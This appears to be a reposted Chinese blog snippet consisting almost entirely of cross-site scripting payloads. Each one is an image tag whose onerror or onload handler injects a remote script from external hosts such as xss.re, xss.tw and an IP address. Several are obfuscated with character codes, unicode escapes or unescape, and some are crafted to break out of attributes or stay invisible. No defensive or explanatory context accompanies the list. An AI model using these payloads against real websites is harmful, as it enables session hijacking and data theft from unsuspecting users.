<img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img>
"><img src=x onerror="with(document)body.appendChild(createElement('script')).src='http://***.**1.8.17/23'"></img>
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#" onerror="$.getScript('\u002f\u002fxss.tw\u002f4091')">
<img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'xss.tw'+a+'4091')">
<img src='0' onerror=with(document)body.appendChild(createElement('script')).src='/xx'>
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" onload="s=document.createElement('script');s.src='http://xx'+Math.random();document.body.appendChild(s)" border="0">
<img src=i onerror=eval(jQuery.getScript('//xss.tw/4091'))>
<img src=N onerror=eval(javascript:document.write(unescape(' <script src="http://xxx.js"></script>'));)>
<img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'>
<img src=x onerror="with(document)body.appendChild(createElement('script')).src='http://xss.tw/4814'" width="0" height="0"></img>
本文转自http://www.cnblogs.com/hookjoy/p/3538487.html
浙公网安备 33010602011771号